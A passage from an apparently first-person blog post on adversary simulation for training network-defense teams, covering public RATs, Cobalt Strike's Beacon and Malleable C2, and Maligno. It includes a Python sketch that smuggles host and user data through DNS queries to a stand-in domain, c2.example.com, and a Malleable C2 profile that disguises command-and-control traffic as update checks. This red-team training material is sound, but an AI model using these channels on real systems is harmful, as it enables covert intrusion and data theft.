Another approach is to use public malware on your customer’s network. Load up DarkComet, Gh0st RAT, or Bifrost and execute attacker-like actions. Of course, before you use this public malware, you have to audit it for backdoors and make sure you’re not introducing an adversary into your network. On the bright side, it’s free.

This approach is restrictive though. You’re limiting yourself to malware that you have a full toolchain for [the user interface, the C2 server, and the agent]. This is also the malware that off-the-shelf products will catch best. I like to joke that some anti-APT products catch 100% of APT malware, so long as you limit your definition of APT malware to DarkComet.

This is probably a good approach with a new team, but as the network security monitoring team matures, you’ll need better capability to challenge them and keep their interest.

Use an Adversary Simulation Tool

Penetration testing tools are NOT adequate adversary simulation tools. They usually have one post-exploitation agent with limited protocols and fixed communication options. If you use a penetration testing tool and give up its indicators, it’s burned after that. This lack of communication flexibility and options makes most penetration testing tools poor choices for adversary simulation.

Cobalt Strike overcomes some of these problems. Cobalt Strike’s Beacon payload does bi-directional communication over named pipes (SMB), DNS TXT records, DNS A records, HTTP, and HTTPS. Beacon also gives you the flexibility to call home to multiple places and to vary the interval at which it calls home. This allows you to simulate an adversary that uses asynchronous bots and distributed infrastructure.
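To illustrate why a DNS channel matters for this kind of simulation, here’s a rough sketch of how data can be smuggled through hostname labels in DNS queries. This is not Beacon’s actual wire format, just the general shape of a DNS C2 channel, with an illustrative attacker domain:

```python
import base64

def chunk_to_labels(data: bytes, max_label: int = 63) -> list:
    """Encode data as DNS-safe hostname labels (63 bytes max each)."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    return [encoded[i:i + max_label] for i in range(0, len(encoded), max_label)]

# A beacon check-in smuggled into a DNS lookup; the defender sees only
# an odd-looking query headed to the attacker's authoritative domain.
labels = chunk_to_labels(b"hostname=WS01;user=jdoe")
query = ".".join(labels) + ".c2.example.com"
```

The server side reverses the encoding and answers with A or TXT records that carry tasking. Varying the lookup interval is what makes the channel asynchronous and hard to spot in the noise of normal DNS traffic.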

The above features make Beacon a better post-exploitation agent. They don’t address the adversary replication problem. One difference between a post-exploitation agent and an adversary replication tool is user-controlled indicators. Beacon’s Malleable C2 gives you this. Malleable C2 is a technology that lets you, the end user, change Beacon’s network indicators to look like something else. It takes two minutes to craft a profile that accurately mimics legitimate traffic or other malware. I took a lot of care to make this process as easy as possible.
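For a taste of what this looks like, here is a small fragment in the Malleable C2 profile language. It dresses Beacon’s HTTP GET transaction up as an innocuous-looking update check; the URI, cookie prefix, and header values are illustrative, not indicators from any real sample:

```
http-get {
    set uri "/updates/check";

    client {
        header "Accept" "*/*";
        # session metadata rides in a cookie
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/octet-stream";
        # tasking comes back base64-encoded in the response body
        output {
            base64;
            print;
        }
    }
}
```

Swap the URI, headers, and encoding steps and the same Beacon session presents an entirely different set of network indicators to the defense team.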

Malleable Command and Control

Cobalt Strike isn’t the only tool with this approach either. Encripto released Maligno, a Python agent that downloads shellcode and injects it into memory. This agent allows you to customize its network indicators to provide a trail for an intrusion analyst to follow.

Malleable C2 is a good start toward supporting adversary simulation from a red team tool, but it’s not the whole picture. Adversary simulation requires new storytelling tools and other types of customizable indicators, and it also requires a rethink of workflows for lateral movement and post-exploitation. There’s a lot of work to do yet.

Putter Panda – Threat Replication Case Study

Will Adversary Simulation work?

I think so. I’d like to close this post with an observation, taken across various exercises:

In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary. This is part of what allows these adversaries the freedom to live and work on so many networks. An inability to find these adversaries creates a sense of complacency. If I can’t see them, maybe they’re not there?

By exercising a network defense team and providing actionable feedback with useful details, you’re giving that team a way to understand their level. The teams that take the debrief seriously will figure out how to improve and get better.

Over time, you will find that these teams, spurred by your efforts, are operating at a level that will challenge your ability to create a meaningful experience for them. I’ve provided repeat red team support to many events since 2011. Each year I see the growth of the returning teams that my friends and I support. It’s rewarding work, and we see the difference.

Heed my words though: the strongest network defense teams require a credible challenge to get better. Without adversary simulation tools [built or bought], you will quickly exhaust your ability to challenge these teams and keep up with their growth.
